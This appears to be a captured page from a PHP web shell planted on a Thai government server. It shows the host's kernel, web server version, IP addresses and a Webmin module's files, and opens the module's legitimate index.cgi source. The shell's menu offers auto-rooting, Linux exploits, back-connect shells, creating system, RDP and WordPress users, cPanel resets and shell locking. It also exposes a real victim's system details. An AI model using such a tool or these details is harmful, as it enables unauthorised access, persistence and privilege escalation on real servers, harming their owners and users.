Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
cluster-usermin /
[ HOME SHELL ]
Name
Size
Permission
Action
help
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
319
B
-rw-r--r--
add.cgi
2.04
KB
-rwxr-xr-x
cluster-usermin-lib.pl
7.14
KB
-rwxr-xr-x
config
25
B
-rw-r--r--
config.info
108
B
-rw-r--r--
config.info.ca
131
B
-rw-r--r--
config.info.ca.UTF-8
133
B
-rw-r--r--
config.info.cz
71
B
-rw-r--r--
config.info.cz.UTF-8
79
B
-rw-r--r--
config.info.de
129
B
-rw-r--r--
config.info.de.UTF-8
129
B
-rw-r--r--
config.info.es
61
B
-rw-r--r--
config.info.es.UTF-8
63
B
-rw-r--r--
config.info.fr
75
B
-rw-r--r--
config.info.fr.UTF-8
77
B
-rw-r--r--
config.info.hr
0
B
-rw-r--r--
config.info.hu
0
B
-rw-r--r--
config.info.ms_MY
131
B
-rw-r--r--
config.info.ms_MY.UTF-8
131
B
-rw-r--r--
config.info.nl
129
B
-rw-r--r--
config.info.nl.UTF-8
129
B
-rw-r--r--
config.info.no
131
B
-rw-r--r--
config.info.no.UTF-8
131
B
-rw-r--r--
config.info.pl
119
B
-rw-r--r--
config.info.pl.UTF-8
122
B
-rw-r--r--
delete_host.cgi
251
B
-rwxr-xr-x
delete_mod.cgi
3.89
KB
-rwxr-xr-x
edit_acl.cgi
4.2
KB
-rwxr-xr-x
edit_host.cgi
3.37
KB
-rwxr-xr-x
edit_mod.cgi
5.42
KB
-rwxr-xr-x
index.cgi
6.02
KB
-rwxr-xr-x
install.cgi
7.49
KB
-rwxr-xr-x
module.info
211
B
-rw-r--r--
module.info.ca
126
B
-rw-r--r--
module.info.ca.UTF-8
143
B
-rw-r--r--
module.info.cz
34
B
-rw-r--r--
module.info.cz.UTF-8
40
B
-rw-r--r--
module.info.de
125
B
-rw-r--r--
module.info.de.UTF-8
137
B
-rw-r--r--
module.info.es
41
B
-rw-r--r--
module.info.es.UTF-8
48
B
-rw-r--r--
module.info.fr
36
B
-rw-r--r--
module.info.fr.UTF-8
42
B
-rw-r--r--
module.info.hu
34
B
-rw-r--r--
module.info.hu.UTF-8
40
B
-rw-r--r--
module.info.ms_MY
118
B
-rw-r--r--
module.info.ms_MY.UTF-8
130
B
-rw-r--r--
module.info.nl
32
B
-rw-r--r--
module.info.nl.UTF-8
38
B
-rw-r--r--
module.info.no
33
B
-rw-r--r--
module.info.no.UTF-8
39
B
-rw-r--r--
module.info.pl
123
B
-rw-r--r--
module.info.pl.UTF-8
137
B
-rw-r--r--
refresh.cgi
3.36
KB
-rwxr-xr-x
save_acl.cgi
3.28
KB
-rwxr-xr-x
sync.cgi
3.94
KB
-rwxr-xr-x
sync_form.cgi
1.78
KB
-rwxr-xr-x
update.cgi
4.1
KB
-rwxr-xr-x
upgrade.cgi
12.83
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.cgi
#!/usr/bin/perl # Shows hosts on which Usermin is installed require './cluster-usermin-lib.pl'; &ui_print_header(undef, $text{'index_title'}, "", "intro", 1, 1); # Display hosts on which modules will be installed print &ui_subheading($text{'index_hosts'}); @servers = &list_servers(); @hosts = &list_usermin_hosts(); if ($config{'sort_mode'} == 1) { @hosts = sort { my ($as) = grep { $_->{'id'} == $a->{'id'} } @servers; my ($bs) = grep { $_->{'id'} == $b->{'id'} } @servers; lc($as->{'host'}) cmp lc($bs->{'host'}) } @hosts; } elsif ($config{'sort_mode'} == 2) { @hosts = sort { my ($as) = grep { $_->{'id'} == $a->{'id'} } @servers; my ($bs) = grep { $_->{'id'} == $b->{'id'} } @servers; lc(&server_name($as)) cmp lc(&server_name($bs)) }@hosts; } $formno = 0; foreach $h (@hosts) { local ($s) = grep { $_->{'id'} == $h->{'id'} } @servers; next if (!$s); push(@titles, &server_name($s)."<br>". &text('index_version', $h->{'version'})); push(@links, "edit_host.cgi?id=$h->{'id'}"); push(@icons, "$gconfig{'webprefix'}/servers/images/$s->{'type'}.gif"); $gothost{$h->{'id'}}++; } if (@links) { if ($config{'table_mode'}) { # Show as table print &ui_columns_start([ $text{'index_thost'}, $text{'index_tdesc'}, $text{'index_tver'}, $text{'index_ttype'} ]); foreach $h (@hosts) { local ($s) = grep { $_->{'id'} == $h->{'id'} } @servers; next if (!$s); local ($type) = grep { $_->[0] eq $s->{'type'} } @servers::server_types; print &ui_columns_row([ &ui_link("edit_host.cgi?id=$h->{'id'}",($s->{'host'} || &get_system_hostname())), $s->{'desc'}, $h->{'version'}, $type->[1], ]); } print &ui_columns_end(); } else { # Show as icons &icons_table(\@links, \@titles, \@icons); } } else { print "<b>$text{'index_nohosts'}</b><p>\n"; } # Build common selectors @wgroups = &all_groups(\@hosts); $modsel2 = $modsel = "<select name=mod>\n"; $modsel2 .= "<option value=''>$text{'index_gacl'}</option>\n"; foreach $m (&all_modules(\@hosts)) { $modsel .= "<option value=$m->{'dir'}>$m->{'desc'}</option>\n"; $modsel2 .= "<option value=$m->{'dir'}>$m->{'desc'}</option>\n"; } $modsel .= "</select>\n"; $modsel2 .= "</select>\n"; $themesel = "<select name=theme>\n"; foreach $t (&all_themes(\@hosts)) { $themesel .= "<option value=$t->{'dir'}>$t->{'desc'}</option>\n"; } $themesel .= "</select>\n"; # Show button for adding server print "<table data-post-icon-row-submit width=100%><tr>\n"; @addservers = grep { !$gothost{$_->{'id'}} } @servers; if (@addservers) { print "<td><form action=add.cgi>\n"; print "<input type=submit name=add value='$text{'index_add'}'>\n"; print "<select name=server>\n"; foreach $s (@addservers) { print "<option value=$s->{'id'}>",&server_name($s),"</option>\n"; } print "</select>\n"; print "</td></form>\n"; $formno++; } else { print "<td></td>\n"; } # Show button for adding server group @groups = &servers::list_all_groups(\@servers); if (@groups) { print "<td align=right><form action=add.cgi>\n"; print "<input type=submit name=gadd value='$text{'index_gadd'}'>\n"; print "<select name=group>\n"; foreach $g (@groups) { print "<option>$g->{'name'}</option>\n"; } print "</select>\n"; print "</form></td>\n"; $formno++; } else { print "<td></td>\n"; } print "</tr></table>\n"; if (@hosts) { # Display modules lists and new module form print &ui_hr(); print &ui_subheading($text{'index_modules'}); print "<table width=100%><tr>\n"; print "<td><form action=edit_mod.cgi>\n"; print "<input type=submit value=\"$text{'index_edit'}\">\n"; print $modsel; print "<input type=submit name=tedit value=\"$text{'index_tedit'}\">\n"; print $themesel; print "</form></td></tr>\n"; $formno++; print "<tr> <td align=left colspan=2><form action=refresh.cgi>\n"; print "<input type=submit value='$text{'index_refresh'}'>\n"; &create_on_input(undef, 1, 1); print "</form></td>\n"; $formno++; print "</table><p>\n"; print "<form action=install.cgi method=post ", "enctype=multipart/form-data>\n"; print "$text{'index_installmsg'}<p>\n"; print "<input type=radio name=source value=0 checked> $text{'index_local'}\n"; print "<input name=local size=50>\n"; print &file_chooser_button("local", 0, $formno); print "<br>\n"; print "<input type=radio name=source value=1> $text{'index_uploaded'}\n"; print "<input type=file name=upload size=20><br>\n"; print "<input type=radio name=source value=2> $text{'index_ftp'}\n"; print "<input name=url size=50><br>\n"; print " " x 5,"<input type=checkbox name=down value=1> ", "$text{'index_down'}<p>\n"; print "<input type=checkbox name=nodeps value=1> ", "$text{'index_nodeps'}<br>\n"; print "$text{'index_installon'}\n"; &create_on_input(); print "<p>\n"; print "<input type=submit value=\"$text{'index_installok'}\">\n"; print "</form>\n"; $formno++; # Display upgrade form &foreign_require("webmin", "webmin-lib.pl"); print &ui_hr(); print &ui_subheading($text{'index_upgrade'}); print "$text{'index_updesc'}<p>\n"; # what kind of install is the local system? $mode = &usermin::get_install_type(); print "<form action=upgrade.cgi method=post enctype=multipart/form-data>\n"; print "<input type=hidden name=mode value='$mode'>\n"; print "<input type=radio name=source value=0> $text{'index_local'}\n"; print "<input name=file size=40>\n"; print &file_chooser_button("file", 0, $formno),"<br>\n"; print "<input type=radio name=source value=1> $text{'index_uploaded'}\n"; print "<input name=upload type=file size=30><br>\n"; print "<input type=radio name=source value=5> $text{'index_ftp'}\n"; print "<input name=url size=40><br>\n"; if ($in{'mode'} eq 'rpm' || !$in{'mode'}) { print "<input type=radio name=source value=2 checked> $webmin::text{'upgrade_ftp'}<br>\n"; } print "<p>\n"; print "<input type=checkbox name=delete value=1> ", "$webmin::text{'upgrade_delete'}<br>\n"; print "$text{'index_upgradeon'}\n"; &create_on_input(); print "<input type=submit value=\"$usermin::text{'upgrade_ok'}\">\n"; print "</form>\n"; $formno++; } &ui_print_footer("/", $text{'index'});
Close